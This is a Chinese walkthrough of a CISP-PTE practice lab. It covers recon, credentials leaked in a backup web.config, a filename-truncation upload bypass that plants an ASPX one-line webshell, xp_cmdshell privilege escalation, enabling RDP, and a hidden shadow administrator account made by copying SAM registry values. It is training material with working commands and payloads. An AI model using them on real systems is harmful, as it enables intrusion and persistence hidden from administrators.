CISP-PTE经典靶场解析(超详细)

admin 2024年8月2日21:35:57评论84 views字数 2869阅读9分33秒阅读模式

信息收集

kali攻击机:192.168.111.146

靶机:192.168.111.129

环境搭建,网卡都是配置的NAT模式,同一网段下
ip
nmap -sS 192.168.111.0/24
CISP-PTE经典靶场解析(超详细)

或者

netdiscover -i eth0 -r 192.168.111.0/24
CISP-PTE经典靶场解析(超详细)

端口

nmap -A -p- -T4 192.168.111.129

1433:sql server的默认端⼝

CISP-PTE经典靶场解析(超详细)

27689: 访问看看是什么服务的端口

CISP-PTE经典靶场解析(超详细)

文件上传下载系统,使用burp对用户名和密码进行爆破,没有爆破成功。

目录

基于这个27689端口,进行目录扫描,看是否存在敏感目录

dirsearch -u http://192.168.111.129:27689

dirb http://192.168.111.129:27689

gobuster dir -u http://192.168.111.129:27689 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,html

我这里使用dirsearch进行扫描

CISP-PTE经典靶场解析(超详细)

访问:http://192.168.111.129:27689/admin/admin.aspx

CISP-PTE经典靶场解析(超详细)

访问http://192.168.111.129:27689/Robots.txt

CISP-PTE经典靶场解析(超详细)

继续访问http://192.168.111.129:27689/web.config.bak

CISP-PTE经典靶场解析(超详细)

可以看到下载了一个文件,通常.bak⽂件是备份⽂件,查看该备份文件,得到SQL server数据库的名称FileManage,用户名down,密码downsql。

CISP-PTE经典靶场解析(超详细)

连接数据库

CISP-PTE经典靶场解析(超详细)

得到用户名admin,密码asdadwn_d2112

CISP-PTE经典靶场解析(超详细)

利用文件上传功能

登录文件上传下载系统,上传文件发现只允许上传txt,jpg ,黑名单限制比较死

CISP-PTE经典靶场解析(超详细)

更具提示文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名

CISP-PTE经典靶场解析(超详细)

思考:只要我们上传的文件名超过32位,通过溢出导致上传木马文件,参考ID55 ,上传文件名为aaaaaaaa.aspx.txt

文件名:aaaaaaaa.aspx.txt
内容:<%@ Page Language="Jscript"%><%eval(Request.Item["666"],"unsafe");%>
CISP-PTE经典靶场解析(超详细)
CISP-PTE经典靶场解析(超详细)

成功上传

CISP-PTE经典靶场解析(超详细)

查找文件路径,根据报错提示文件路径为../upfile/affix/"+fileName

CISP-PTE经典靶场解析(超详细)

文件路径为:http://192.168.111.129:27689/upfile/affix/638582066907968750-aaaaaaaa.aspx

连接webshell:使用蚁剑进行连接

CISP-PTE经典靶场解析(超详细)
CISP-PTE经典靶场解析(超详细)

利用文件下载功能

通过上面一系列的操作,其实可以直观的看到存在任意文件下载漏洞

点击文件名称,下载该文件

CISP-PTE经典靶场解析(超详细)

这里已经知道文件路径../upfile/affix/"+fileName

http://192.168.111.129:27689/upfile/affix/636625082296562500-bbbbbbbb.aspx

查看文件内容,得到连接密码z

CISP-PTE经典靶场解析(超详细)

使用蚁剑链接webshell

CISP-PTE经典靶场解析(超详细)

提权

点击右键,执行终端whoami

CISP-PTE经典靶场解析(超详细)

利用sqlserver 提权

数据库提权的前提条件:

1、服务器开启数据库服务
2、获取到最高权限用户密码即sa
(除Access数据库外,其他数据库基本都存在数据库提权的可能)

数据库我们已经进行了连接,现在是要获取sa的用户名和密码

在备份文件web.config.bak.2017-12-12找到了sa的用户名和密码

CISP-PTE经典靶场解析(超详细)

连接sa,数据库名称FileManage,用户名sa 密码cisp-pte@sa

CISP-PTE经典靶场解析(超详细)

使用xp_cmdshell进行提权

sql sever有一个自带的系统数据库master,而xp_cmdshell在 存储过程、扩展存储过程中,查看扩展存储过程,如果其中含有sys.xp_cmdshell 说明目标网站没有删除该组件

CISP-PTE经典靶场解析(超详细)

选择数据库,新建查询,执行命令

EXEC master.dbo.xp_cmdshell 'whoam'

成功提权

CISP-PTE经典靶场解析(超详细)

注意:如果执行命令如果报错提示关闭,那么就使用开启 xp_cmdshell 的命令(只有sa权限才可以开启)

EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

权限维持

这里还可以利用xp_cmdshell开启远程桌面,新建用户,做权限维持

通过注册表开启远程桌面3389端口命令

reg add  "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

xp_cmdshell变形

EXEC master.dbo.xp_cmdshell 'reg add  "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
CISP-PTE经典靶场解析(超详细)

检查端口状态

EXEC master.dbo.xp_cmdshell 'netstat -an|find "3389"'
CISP-PTE经典靶场解析(超详细)

添加影子用户,并加入管理员组

EXEC master.dbo.xp_cmdshell 'net user test$ 123456 /add'

EXEC master.dbo.xp_cmdshell 'net localgroup administrators test$ /add'
CISP-PTE经典靶场解析(超详细)
CISP-PTE经典靶场解析(超详细)

win+r 输入mstsc,连接远程桌面

CISP-PTE经典靶场解析(超详细)

输入新建影子账户和密码

影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持。

CISP-PTE经典靶场解析(超详细)

成功登录

CISP-PTE经典靶场解析(超详细)

打开cmd 输入regedit,找到HKEY_LOCAL_MACHINESAMSAM,修改SAM权限,赋予adminitrators完全控制权限,重启之后找到test$账户

CISP-PTE经典靶场解析(超详细)

找到administrator用户的F值数据

CISP-PTE经典靶场解析(超详细)

将Administrator用户对应项的F数据值复制到test$用户对应项的F数据值

CISP-PTE经典靶场解析(超详细)

所对应项000003F4导出,分别命名为test.reg和1.reg

CISP-PTE经典靶场解析(超详细)

删除test$用户,将test.reg和1.reg导入注册表

net user test$ /del
regedit /s test.reg 
regedit /s 1.reg
CISP-PTE经典靶场解析(超详细)

此时在用户组已经看不到test$用户。

加下方wx,拉你一起进群学习

CISP-PTE经典靶场解析(超详细)

原文始发于微信公众号(红队蓝军):CISP-PTE经典靶场解析(超详细)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月2日21:35:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CISP-PTE经典靶场解析(超详细)https://cn-sec.com/archives/3027559.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息